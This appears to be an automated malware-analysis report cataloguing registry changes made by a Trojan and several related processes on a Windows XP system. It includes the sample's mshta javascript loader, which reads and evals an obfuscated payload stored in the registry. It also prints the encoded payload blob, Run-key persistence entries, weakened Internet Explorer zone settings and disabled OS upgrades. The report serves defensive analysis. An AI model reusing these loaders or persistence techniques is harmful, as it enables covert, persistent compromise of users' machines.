[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"

[HKLM\SOFTWARE\08D9199AFCC469E5F79B]
"1D709C0DD4691288F7" = "1D709C0DD4691288F7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\A51EADA45C528B6F6B]
"8D2E520561B1C21CD" = "8D2E520561B1C21CD"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 AB 23 78 63 4B DC 99 40 F3 EE 97 07 E1 46 59"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\A51EADA45C528B6F6B]
[HKLM\SOFTWARE\08D9199AFCC469E5F79B]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\08D9199AFCC469E5F79B]
"1D709C0DD4691288F7"

[HKLM\SOFTWARE\A51EADA45C528B6F6B]
"8D2E520561B1C21CD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

The process regsvr32.exe:2644 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 88 E9 A0 DA EE 28 71 CC FF 4F AD A0 A4 07 9D"

The process regsvr32.exe:2700 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:qqqKk5V2ak=gr;d36Y=new ActiveXObject(WScript.Shell);RDjMp8Tw=7jV6cXJTk5;o53JnY=d36Y.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);PSfU04tT=7R;eval(o53JnY);UBTG6t3ih=Xuhqxc;P"

[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"

[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "863"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKCU\Software\Classes\.54crF]
"(Default)" = "YoQ1"

[HKCU\Software\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe"
"5232108f" = "/ÒÜ|›² ‰n_j'ÁÁ¹·ÏA­¹Š=Ò@ú”¦ã¤)[ï…EÐplp'½xÀPÝ&9åú„r‡B­H‘ÍøcE—i¬ôŽ›@ Ë(¸)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"5119f545" = "U7yeyZIyFNDURLMKACVRm=NOXUzHHZenqYIpUsbdKypsnVgUU1dhGtSNAuXNqW9YwoQNkvNoDyGwHjaD8vCOarBRNS4Emtzd3lCzVHeFLCo6MQKYd9fe0L73rGNfLiFV5ilGXi0MEKno1AIq;RGrGI0XcrfQvThdeeAa=Mx2oGPjrQl4tgRtSWF14fTmuv19y0FL3V8DrgGuvDHSgQn2lbGf4TXW6IvCejGyZ1wKVbO3f55fCMsYnGyPb3ITu7lMA5xtodhh2nDUpagaZNCpYJ9TiBNBX;LHSaeZeemJZjB4ylJcGEt=W95EvZFE5o2ZTbFPFxk9IMZK1hpABlsMJvEBM2l22l6lHrkqJtI8ae3jWJ5IBkq49QWIJN7uHIhw8rISLCeSEfoQXyGmKjzSHlEpdmEy4tDhepdS2Yiw3qTF2lD7iDLTfOy4T;mhANhUCGdgkGyuPiOLbu1T=ruy3VTEcJBa9w59M4WWfU0AuPV;PhbMcLBdg7TMdwDnRJY=PBJGZc4CJiP8d68WnZC1AzlED2QBzSQhaEHHJD36Pkx5iwpnsFJ4JaIvHX3lqcNDVUkUmZAuWwYfQ1FlpRnVOE6TGKJrRzUhqbP7vsjM2AyhKPjXdusvl;gza0pJgPHDmWXTxFRJoMtWTJ=MzhBJitRRHE6H3LojkyKF5GUYKyqXc2Ik9NBDKajVav2YIvJuAttj3mB;NCJHQHwEjp0ZqNFXaTqvmWG=SUCwHDaEo7f29rQjQfPEkLXG7Q1;El95C=37771B1C194845203C197030142114471B160F1E35261A72416429426714271408290F3368163B1A617D68770E23295375273C7C6E4C185769250D1F777110002C77002D015B23150776026D21420A1125080E3A0F6E126F3824335544755724011177141B60661518005B225A2538252001020A121F292P"
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"

[HKCU\Software\e307dfcb0a]
"f4ea4294" = "863"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\e307dfcb0a]
"5119f545" = "U7yeyZIyFNDURLMKACVRm=NOXUzHHZenqYIpUsbdKypsnVgUU1dhGtSNAuXNqW9YwoQNkvNoDyGwHjaD8vCOarBRNS4Emtzd3lCzVHeFLCo6MQKYd9fe0L73rGNfLiFV5ilGXi0MEKno1AIq;RGrGI0XcrfQvThdeeAa=Mx2oGPjrQl4tgRtSWF14fTmuv19y0FL3V8DrgGuvDHSgQn2lbGf4TXW6IvCejGyZ1wKVbO3f55fCMsYnGyPb3ITu7lMA5xtodhh2nDUpagaZNCpYJ9TiBNBX;LHSaeZeemJZjB4ylJcGEt=W95EvZFE5o2ZTbFPFxk9IMZK1hpABlsMJvEBM2l22l6lHrkqJtI8ae3jWJ5IBkq49QWIJN7uHIhw8rISLCeSEfoQXyGmKjzSHlEpdmEy4tDhepdS2Yiw3qTF2lD7iDLTfOy4T;mhANhUCGdgkGyuPiOLbu1T=ruy3VTEcJBa9w59M4WWfU0AuPV;PhbMcLBdg7TMdwDnRJY=PBJGZc4CJiP8d68WnZC1AzlED2QBzSQhaEHHJD36Pkx5iwpnsFJ4JaIvHX3lqcNDVUkUmZAuWwYfQ1FlpRnVOE6TGKJrRzUhqbP7vsjM2AyhKPjXdusvl;gza0pJgPHDmWXTxFRJoMtWTJ=MzhBJitRRHE6H3LojkyKF5GUYKyqXc2Ik9NBDKajVav2YIvJuAttj3mB;NCJHQHwEjp0ZqNFXaTqvmWG=SUCwHDaEo7f29rQjQfPEkLXG7Q1;El95C=37771B1C194845203C197030142114471B160F1E35261A72416429426714271408290F3368163B1A617D68770E23295375273C7C6E4C185769250D1F777110002C77002D015B23150776026D21420A1125080E3A0F6E126F3824335544755724011177141B60661518005B225A2538252001020A121F292P"
"0494a3ce" = "1463001449"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 76 61 AD 3F 7D 6B 47 91 BC A6 E5 0D DC 5B 7B"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\e307dfcb0a]
"5232108f" = "/ÒÜ|›² ‰n_j'ÁÁ¹·ÏA­¹Š=Ò@ú”¦ã¤)[ï…EÐplp'½xÀPÝ&9åú„r‡B­H‘ÍøcE—i¬ôŽ›@ Ë(¸)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"

[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "CB153804BB053A10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade]
"ReservationsAllowed" = "0"

[HKCU\Software\e307dfcb0a]
"52b1e748" = "CB153804BB053A10"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKCU\Software\Classes\YoQ1\shell\open\command]
"(Default)" = "mshta javascript:UPH9r6uZF=A4DSokG;FK87=new ActiveXObject(WScript.Shell);RSmW5p7s=f2nwkSu7f;dox2H=FK87.RegRead(HKCU\\software\\e307dfcb0a\\5119f545);LEsIMPGA1=94o2U;eval(dox2H);qz23cVjgqX=4xWUYT;"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1463001449"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

"ProxyServer"
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

The process regsvr32.exe:2952 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 52 80 99 FC 92 3A 9B A6 31 A1 17 42 9D 7A 79"

The process summit_sharma.exe:2672 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 76 10 06 C9 D9 ED 05 17 15 37 FA 81 58 84 D5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process 07-04-2016_hwopt_3.0.10-1.exe:1632 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 85 14 81 69 93 28 09 58 35 D8 1D 56 FC 30 DD"

The process XBLive.exe:3008 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA DA BB 10 01 15 28 47 CB 4D 8C FE 2A 37 78 E3"

[HKLM\SOFTWARE\Microsoft\DirectX]
"EID" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process InstallationStatsUploder_12052016001648.exe:2044 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 3E 8B 28 0B 7E 16 88 E4 2F 0A 2B 2F 2B 39 83"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallationStatsUploder_12052016001648.exe:1488 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 BE 15 85 1C ED 98 47 AD 25 69 09 FE A8 0E FF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallationStatsUploder_12052016001648.exe:580 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 57 29 8F 58 8A 00 55 36 D7 C0 0A D4 7F 9D 9D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallationStatsUploder_12052016001648.exe:1636 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 80 AE 91 25 C4 94 A7 F5 AE CA DA C7 8A 50 2C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallationStatsUploder_12052016001648.exe:1860 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E F0 A1 9E E7 DF 95 8B 3B 15 55 3D 63 06 51 57"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallationStatsUploder_12052016001648.exe:1612 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 60 C3 23 39 A9 43 EB F1 2F B5 12 D9 89 82 55"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallationStatsUploder_12052016001648.exe:640 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 95 32 27 9E 61 DB 73 3F 94 CB 5B 2A 01 64 B0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallationStatsUploder_12052016001648.exe:1848 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 DE F0 A9 00 A1 59 EF 0A AF 09 35 5B 56 5A CB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallationStatsUploder_12052016001648.exe:508 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 33 0B D0 07 E7 E6 7F 40 8A C4 69 B0 3D FA 25"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallationStatsUploder_12052016001648.exe:1292 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 2C ED FE 93 8E 5D A8 7E 36 2E 36 CB 00 1B A5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process InstallationStatsUploder_12052016001648.exe:1400 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "hwopt12052016001648_updater_service, hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0, Microsoft.Transactions.Bridge 3.0.0.0, Microsoft H.323 Telephony Service Provider"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[INSTALL_UN_INSTALL_STATU_SUPDATER]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 3C D8 3C 7E 39 DF C4 8E 6E 12 23 D2 2F 5C A1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallationStatsUploder_12052016001648\DEBUG]
"Trace Level" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

